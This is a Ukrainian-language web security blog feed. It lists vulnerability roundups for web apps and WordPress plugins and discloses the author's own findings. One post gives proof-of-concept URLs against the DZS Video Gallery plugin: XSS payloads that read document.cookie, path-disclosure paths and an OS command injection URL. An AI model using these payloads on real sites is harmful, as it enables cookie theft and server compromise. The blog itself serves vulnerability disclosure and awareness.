Websecurity - Веб безпека

У липні, 13.07.2014, я знайшов уразливості в Dahua IP Camera (веб камера). Зокрема Brute Force та Abuse of Functionality уразливості.

Раніше я писав про уразливості у веб камерах, зокрема в D-Link DCS-2103.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

В даній добірці уразливості в веб додатках:

• HP Smart Zero Client, Unauthorized Access (деталі)
• gpEasy v4.3.x CMS - Multiple Web Vulnerabilities (деталі)
• WHMCS Denial of Service Vulnerability (деталі)
• MantisBT input sanitization errors (деталі)
• Microsoft Security Bulletin MS13-061 - Critical Vulnerabilities in Microsoft Exchange Server Could Allow Remote Code Execution (2876063) (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах SS Downloads, Infocus та Amerisale-Re. Для котрих з’явилися експлоіти. SS Downloads - це плагін для підрахунку скачувань, Infocus - це тема движка, Amerisale-Re - це e-commerce плагін.

• WordPress SS Downloads Cross Site Scripting (деталі)
• WordPress Infocus Theme Cross Site Scripting (деталі)
• WordPress Amerisale-Re Remote Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• Aastra IP Telephone hardcoded telnet admin password (деталі)
• Multiple reflected XSS vulnerabilities in Atmail WebMail (деталі)
• Remote Code Execution in Projoom NovaSFH Plugin (деталі)
• AlienVault OSSIM SQL Injection vulnerability (деталі)
• Low severity flaw in RIM BlackBerry PlayBook OS browser (деталі)

08.05.2014

У квітні, 24.04.2014, я виявив Cross-Site Scripting, Full path disclosure та OS Commanding уразливості в плагіні DZS Video Gallery для WordPress. Про що найближчим часом повідомлю розробникам веб додатку.

Стосовно плагінів для WordPress раніше я писав про уразливості в Js-Multi-Hotel для WordPress.

Детальна інформація про уразливості з’явиться пізніше.

12.07.2014

Cross-Site Scripting (WASC-08):

http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?designrand=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full path disclosure (WASC-13):

http://site/wp-content/plugins/dzs-videogallery/videogallery.php
http://site/wp-content/plugins/dzs-videogallery/admin/sliderexport.php

Уразливості в php-скриптах або в error_log у всіх папках плагіна. Різні файли в різних версіях плагіна.

OS Commanding (WASC-31):

http://site/wp-content/plugins/dzs-videogallery/img.php?webshot=1&src=http://site/1.jpg$(os-cmd)

RCE використовуючи метод Pichaya Morimoto.

Вразливі все версії DZS Video Gallery для WordPress.

В даній добірці уразливості в веб додатках:

• Barracuda LB, SVF, WAF & WEF - Multiple Vulnerabilities (деталі)
• Joomla! JomSocial component < 3.1.0.1 - Remote code execution (деталі)
• Security advisory, LedgerSMB 1.3.0-1.3.36 (деталі)
• Publish-It Buffer Overflow Vulnerability (деталі)
• Multiple vulnerabilities on Sitecom N300/N600 devices (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах E-Commerce і Seo Link Rotator та WordPress 3.6. Для котрих з’явилися експлоіти. E-Commerce - це плагін для створення онлайн-магазину, Seo Link Rotator - це плагін для розміщення лінок. А також опис URL Redirection (URL Redirector Abuse) уразливості в WordPress 3.6.

• WordPress E-Commerce 3.8.9.5 File Upload / XSS / CSRF / Code Execution (деталі)
• WordPress Seo Link Rotator Cross Site Scripting (деталі)
• WordPress 3.6 URL Redirection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• HP SiteScope running SOAP, Remote Code Execution (деталі)
• Ektron CMS Take Over - Hijacking Accounts (деталі)
• Vulnerabilities within Mura CMS / Sitecore MCS / SmarterMail (деталі)
• SiteCore XML Control Script Insertion (деталі)
• HP Integrated Lights-Out iLO3, iLO4 IPMI Cipher Suite 0 Authentication Bypass Vulnerability (деталі)

В даній добірці уразливості в веб додатках:

• Multiple vulnerabilities on D-Link DIR-645 devices (деталі)
• Unauthenticated remote access to D-Link DIR-645 devices (деталі)
• Multiple Vulnerabilities in Eventum (деталі)
• Cross-Site Scripting (XSS) in Komento Joomla Extension (деталі)
• SQL Injection in JV Comment Joomla Extension (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах DT Chocolate, Global Flash Galleries та Social Ring. Для котрих з’явилися експлоіти. DT Chocolate - це тема Chocolate WP, про уразливості в якій я вже писав, Global Flash Galleries - це плагін для створення фото галереї, Social Ring - це плагін для розміщення кнопок для поширення інформації в соціальних мережах.

• WordPress DT Chocolate Cross Site Scripting (деталі)
• WordPress Global Flash Galleries File Upload (деталі)
• WordPress Social Ring 1.1.9 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.